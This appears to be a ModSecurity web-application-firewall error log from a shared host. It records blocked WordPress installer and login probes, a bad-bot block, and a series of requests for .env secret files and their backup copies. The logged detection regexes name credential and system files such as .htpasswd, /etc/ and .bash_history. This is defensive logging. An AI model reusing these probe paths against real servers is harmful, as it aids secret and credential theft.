[Tue May 26 19:34:49.913460 2026] [security2:error] [pid 58470:tid 58724] [client 54.205.63.235:64169] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "siliconelevators.in"] [uri "/wordpress/wp-admin/setup-config.php"] [unique_id "ahWogbnjVHRH3AGGvmYVeQAAAHw"]
[Tue May 26 19:34:49.913601 2026] [security2:error] [pid 58470:tid 58682] [client 54.205.63.235:64171] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "siliconelevators.in"] [uri "/wp/wp-admin/setup-config.php"] [unique_id "ahWogbnjVHRH3AGGvmYVewAAAFI"]
[Tue May 26 19:34:49.913684 2026] [security2:error] [pid 58470:tid 58691] [client 54.205.63.235:64170] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "siliconelevators.in"] [uri "/old/wp-admin/setup-config.php"] [unique_id "ahWogbnjVHRH3AGGvmYVegAAAFs"]
[Tue May 26 19:34:49.915916 2026] [security2:error] [pid 58470:tid 58711] [client 54.205.63.235:64174] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "siliconelevators.in"] [uri "/staging/wp-admin/setup-config.php"] [unique_id "ahWogbnjVHRH3AGGvmYVfgAAAG8"]
[Tue May 26 19:34:49.916358 2026] [security2:error] [pid 58470:tid 58633] [client 54.205.63.235:64173] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "siliconelevators.in"] [uri "/wordpress1/wp-admin/setup-config.php"] [unique_id "ahWogbnjVHRH3AGGvmYVfQAAACE"]
[Tue May 26 19:34:49.923526 2026] [security2:error] [pid 58470:tid 58663] [client 54.205.63.235:64179] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "siliconelevators.in"] [uri "/wordpress/wp-admin/install.php"] [unique_id "ahWogbnjVHRH3AGGvmYVgQAAAD8"]
[Tue May 26 19:34:49.923554 2026] [security2:error] [pid 58470:tid 58648] [client 54.205.63.235:64176] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "siliconelevators.in"] [uri "/backup/wp-admin/setup-config.php"] [unique_id "ahWogbnjVHRH3AGGvmYVgAAAADA"]
[Tue May 26 19:34:49.923599 2026] [security2:error] [pid 58470:tid 58685] [client 54.205.63.235:64178] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "siliconelevators.in"] [uri "/wp-admin/install.php"] [unique_id "ahWogbnjVHRH3AGGvmYVggAAAFU"]
[Tue May 26 19:34:49.924422 2026] [security2:error] [pid 58470:tid 58694] [client 54.205.63.235:64180] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "siliconelevators.in"] [uri "/old/wp-admin/install.php"] [unique_id "ahWogbnjVHRH3AGGvmYVgwAAAF4"]
[Tue May 26 19:34:49.924500 2026] [security2:error] [pid 58470:tid 58655] [client 54.205.63.235:64182] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "siliconelevators.in"] [uri "/wordpress1/wp-admin/install.php"] [unique_id "ahWogbnjVHRH3AGGvmYVhQAAADc"]
[Tue May 26 19:34:49.924541 2026] [security2:error] [pid 58470:tid 58664] [client 54.205.63.235:64181] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "siliconelevators.in"] [uri "/staging/wp-admin/install.php"] [unique_id "ahWogbnjVHRH3AGGvmYVhAAAAEA"]
[Tue May 26 19:34:49.928445 2026] [security2:error] [pid 58470:tid 58677] [client 54.205.63.235:64184] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "siliconelevators.in"] [uri "/backup/wp-admin/install.php"] [unique_id "ahWogbnjVHRH3AGGvmYViAAAAE0"]
[Tue May 26 19:34:49.928739 2026] [security2:error] [pid 58470:tid 58706] [client 54.205.63.235:64183] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "siliconelevators.in"] [uri "/wp/wp-admin/install.php"] [unique_id "ahWogbnjVHRH3AGGvmYVhwAAAGo"]
[Tue May 26 19:34:49.928964 2026] [security2:error] [pid 58470:tid 58665] [client 54.205.63.235:64185] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "siliconelevators.in"] [uri "/demo/wp-admin/install.php"] [unique_id "ahWogbnjVHRH3AGGvmYViQAAAEE"]
[Tue May 26 19:34:50.082301 2026] [security2:error] [pid 58470:tid 58720] [client 54.205.63.235:64345] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "siliconelevators.in"] [uri "/test/wp-admin/install.php"] [unique_id "ahWogrnjVHRH3AGGvmYVjgAAAHg"]
[Tue May 26 19:34:50.625440 2026] [security2:error] [pid 58470:tid 58707] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWogrnjVHRH3AGGvmYVkQAAAGs"]
[Tue May 26 19:34:52.390692 2026] [security2:error] [pid 58470:tid 58492] [remote 101.100.249.238:33834] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.249.100.101.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWohLnjVHRH3AGGvmYV2AAANRU"]
[Tue May 26 19:34:52.465572 2026] [security2:error] [pid 58470:tid 58657] [client 45.131.193.4:41591] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 4.193.131.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-login.php"] [unique_id "ahWohLnjVHRH3AGGvmYV2wAAADk"]
[Tue May 26 19:34:52.877648 2026] [security2:error] [pid 58470:tid 58500] [remote 101.100.249.238:33834] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.249.100.101.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWohLnjVHRH3AGGvmYV7QAAQx0"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:34:52.898419 2026] [security2:error] [pid 58470:tid 58600] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWohLnjVHRH3AGGvmYV4gAAAAA"]
[Tue May 26 19:34:53.062450 2026] [security2:error] [pid 58470:tid 58612] [client 85.208.96.205:38260] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/day/2024-02-22/"] [unique_id "ahWohbnjVHRH3AGGvmYV7gAAAAw"]
[Tue May 26 19:34:53.062615 2026] [security2:error] [pid 58470:tid 58612] [client 85.208.96.205:38260] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/day/2024-02-22/"] [unique_id "ahWohbnjVHRH3AGGvmYV7gAAAAw"]
[Tue May 26 19:34:54.752041 2026] [security2:error] [pid 58470:tid 58641] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWohrnjVHRH3AGGvmYWGgAAACk"]
[Tue May 26 19:34:56.153910 2026] [security2:error] [pid 58470:tid 58496] [remote 123.30.233.13:35118] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWoh7njVHRH3AGGvmYWTAAAQBk"]
[Tue May 26 19:34:57.280762 2026] [security2:error] [pid 58470:tid 58666] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoiLnjVHRH3AGGvmYWawAAAEI"]
[Tue May 26 19:34:59.172270 2026] [security2:error] [pid 58470:tid 58677] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoirnjVHRH3AGGvmYWrAAAAE0"]
[Tue May 26 19:34:59.725981 2026] [security2:error] [pid 58470:tid 58519] [remote 123.30.233.13:35118] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWoi7njVHRH3AGGvmYWxAAAbzA"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:35:01.413727 2026] [security2:error] [pid 58470:tid 58651] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWojLnjVHRH3AGGvmYW4gAAADM"]
[Tue May 26 19:35:01.979099 2026] [security2:error] [pid 58470:tid 58526] [remote 66.116.199.98:49002] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.199.116.66.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahWojbnjVHRH3AGGvmYXAAAAbTc"]
[Tue May 26 19:35:02.370815 2026] [security2:error] [pid 58470:tid 58703] [client 14.167.219.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWojbnjVHRH3AGGvmYXBgAAAGc"]
[Tue May 26 19:35:02.424375 2026] [security2:error] [pid 58470:tid 58525] [remote 66.116.199.98:49002] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.199.116.66.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahWojrnjVHRH3AGGvmYXCgAAXTY"], referer: https://crustiesplacebakery.com.thedebateafrica.org/wp-login.php
[Tue May 26 19:35:03.479775 2026] [security2:error] [pid 58470:tid 58638] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoj7njVHRH3AGGvmYXKgAAACY"]
[Tue May 26 19:35:05.690697 2026] [security2:error] [pid 58470:tid 58630] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWokbnjVHRH3AGGvmYXdQAAAB4"]
[Tue May 26 19:35:06.848953 2026] [security2:error] [pid 58470:tid 58679] [client 208.84.100.238:6224] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.onesoft.in"] [uri "/___proxy_subdomain_webmail/.env"] [unique_id "ahWokrnjVHRH3AGGvmYXtQAAAE8"]
[Tue May 26 19:35:06.949670 2026] [security2:error] [pid 58470:tid 58689] [client 208.84.100.238:6280] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.onesoft.in"] [uri "/___proxy_subdomain_webmail/backend/.env"] [unique_id "ahWokrnjVHRH3AGGvmYXzQAAAFk"]
[Tue May 26 19:35:06.949747 2026] [security2:error] [pid 58470:tid 58710] [client 208.84.100.238:6266] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.onesoft.in"] [uri "/___proxy_subdomain_webmail/api/.env"] [unique_id "ahWokrnjVHRH3AGGvmYXzwAAAG4"]
[Tue May 26 19:35:06.950047 2026] [security2:error] [pid 58470:tid 58658] [client 208.84.100.238:6264] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.onesoft.in"] [uri "/___proxy_subdomain_webmail/app/.env"] [unique_id "ahWokrnjVHRH3AGGvmYXzgAAADo"]
[Tue May 26 19:35:07.985445 2026] [security2:error] [pid 58470:tid 58631] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWok7njVHRH3AGGvmYX5QAAAB8"]
[Tue May 26 19:35:08.389212 2026] [security2:error] [pid 58470:tid 58707] [client 208.84.100.238:6478] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "webmail.onesoft.in"] [uri "/___proxy_subdomain_webmail/.env.production.copy"] [unique_id "ahWolLnjVHRH3AGGvmYYAAAAAGs"]
[Tue May 26 19:35:08.733091 2026] [security2:error] [pid 58470:tid 58564] [remote 35.233.46.64:43695] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 64.46.233.35.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWolLnjVHRH3AGGvmYYBgAAI10"]
[Tue May 26 19:35:09.054585 2026] [security2:error] [pid 58470:tid 58656] [client 208.84.100.238:6700] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webmail.onesoft.in"] [uri "/___proxy_subdomain_webmail/.env.production.swp"] [unique_id "ahWolbnjVHRH3AGGvmYYGwAAADg"]
[Tue May 26 19:35:09.054945 2026] [security2:error] [pid 58470:tid 58637] [client 208.84.100.238:6666] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "webmail.onesoft.in"] [uri "/___proxy_subdomain_webmail/.env.local.copy"] [unique_id "ahWolbnjVHRH3AGGvmYYHQAAACU"]
[Tue May 26 19:35:09.054969 2026] [security2:error] [pid 58470:tid 58603] [client 208.84.100.238:6696] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webmail.onesoft.in"] [uri "/___proxy_subdomain_webmail/.env.production.backup"] [unique_id "ahWolbnjVHRH3AGGvmYYHwAAAAM"]
[Tue May 26 19:35:09.055768 2026] [security2:error] [pid 58470:tid 58679] [client 208.84.100.238:6600] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webmail.onesoft.in"] [uri "/___proxy_subdomain_webmail/.env.local.bak"] [unique_id "ahWolbnjVHRH3AGGvmYYJwAAAE8"]
[Tue May 26 19:35:09.055771 2026] [security2:error] [pid 58470:tid 58686] [client 208.84.100.238:6578] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "webmail.onesoft.in"] [uri "/___proxy_subdomain_webmail/.env.orig"] [unique_id "ahWolbnjVHRH3AGGvmYYKAAAAFY"]
[Tue May 26 19:35:09.055790 2026] [security2:error] [pid 58470:tid 58699] [client 208.84.100.238:6656] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "webmail.onesoft.in"] [uri "/___proxy_subdomain_webmail/.env.local.orig"] [unique_id "ahWolbnjVHRH3AGGvmYYIAAAAGM"]
[Tue May 26 19:35:09.055845 2026] [security2:error] [pid 58470:tid 58623] [client 208.84.100.238:6568] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webmail.onesoft.in"] [uri "/___proxy_subdomain_webmail/.env.swp"] [unique_id "ahWolbnjVHRH3AGGvmYYKgAAABc"]
[Tue May 26 19:35:09.055968 2026] [security2:error] [pid 58470:tid 58700] [client 208.84.100.238:6642] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webmail.onesoft.in"] [uri "/___proxy_subdomain_webmail/.env.local.swp"] [unique_id "ahWolbnjVHRH3AGGvmYYHgAAAGQ"]
[Tue May 26 19:35:09.056196 2026] [security2:error] [pid 58470:tid 58654] [client 208.84.100.238:6622] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webmail.onesoft.in"] [uri "/___proxy_subdomain_webmail/.env.local.backup"] [unique_id "ahWolbnjVHRH3AGGvmYYJAAAADY"]
[Tue May 26 19:35:09.056199 2026] [security2:error] [pid 58470:tid 58644] [client 208.84.100.238:6716] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "webmail.onesoft.in"] [uri "/___proxy_subdomain_webmail/.env.production.orig"] [unique_id "ahWolbnjVHRH3AGGvmYYGgAAACw"]
[Tue May 26 19:35:09.056615 2026] [security2:error] [pid 58470:tid 58616] [client 208.84.100.238:6640] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webmail.onesoft.in"] [uri "/___proxy_subdomain_webmail/.env.local~"] [unique_id "ahWolbnjVHRH3AGGvmYYIgAAABA"]
[Tue May 26 19:35:09.056857 2026] [security2:error] [pid 58470:tid 58710] [client 208.84.100.238:6524] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webmail.onesoft.in"] [uri "/___proxy_subdomain_webmail/.env.bak"] [unique_id "ahWolbnjVHRH3AGGvmYYLQAAAG4"]
[Tue May 26 19:35:09.057053 2026] [security2:error] [pid 58470:tid 58725] [client 208.84.100.238:6668] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webmail.onesoft.in"] [uri "/___proxy_subdomain_webmail/.env.production.bak"] [unique_id "ahWolbnjVHRH3AGGvmYYHAAAAH0"]
